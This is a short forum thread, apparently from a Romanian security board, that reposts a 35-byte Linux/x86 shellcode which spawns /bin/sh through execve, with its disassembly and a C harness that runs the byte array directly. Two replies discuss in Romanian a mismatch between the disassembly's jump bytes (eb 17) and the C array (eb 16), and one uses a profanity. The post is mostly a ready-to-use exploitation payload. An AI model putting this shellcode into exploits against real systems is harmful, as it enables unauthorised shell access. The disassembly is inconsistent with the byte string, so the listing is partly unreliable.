Aerosol Posted May 4, 2015 Report Share Posted May 4, 2015 /*; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes; Platform: linux/x86_64; Date: 2014-06-26; Author: Mohammad Reza Espargham; Simple ShellCodesection .text:08048060 <_start>: 8048060: eb 17 jmp 804807908048062 : 8048062: 5e pop %esi 8048063: 31 d2 xor %edx,%edx 8048065: 52 push %edx 8048066: 56 push %esi 8048067: 89 e1 mov %esp,%ecx 8048069: 89 f3 mov %esi,%ebx 804806b: 31 c0 xor %eax,%eax 804806d: b0 0b mov $0xb,%al 804806f: cd 80 int $0x80 8048071: 31 db xor %ebx,%ebx 8048073: 31 c0 xor %eax,%eax 8048075: 40 inc %eax 8048076: cd 80 int $0x8008048078 : 8048078: e8 e5 ff ff ff call 8048062 804807d: 2f das 804807e: 62 69 6e bound %ebp,0x6e(%ecx) 8048081: 2f das 8048082: 73 68 jae 80480ec*/#include <stdio.h>#include <string.h>#include <sys/mman.h>#define PAGE_SIZE 4096Uchar code[] = { "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd" "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68"};intmain() {printf("Shellcode Length: %d\n", (int)strlen(code));int (*ret)() = (int(*)())code;ret();return 0;}Source Quote Link to comment Share on other sites More sharing options...
Gushterul Posted May 4, 2015 Report Share Posted May 4, 2015 (nu ca ar fi cineva destept sa le si foloseasca...)jmp 8048079 ? Quote Link to comment Share on other sites More sharing options...
Nytro Posted May 4, 2015 Report Share Posted May 4, 2015 E relativ.Opcode-ul "eb 17" == "sari 0x17 bytes"8048062 (adresa urmatoare) + 0x17 == 8048079E ciudat ca e "jmp 8048079" si nu "jmp 08048078" pentru ca la "08048078" se afla acel call care pune pe stack "/bin/sh".A, pula. Daca te uiti in shellcode-ul din programul C: \xeb\x16\x5e\x31Este "eb 16" adica "jmp 08048078". Quote Link to comment Share on other sites More sharing options...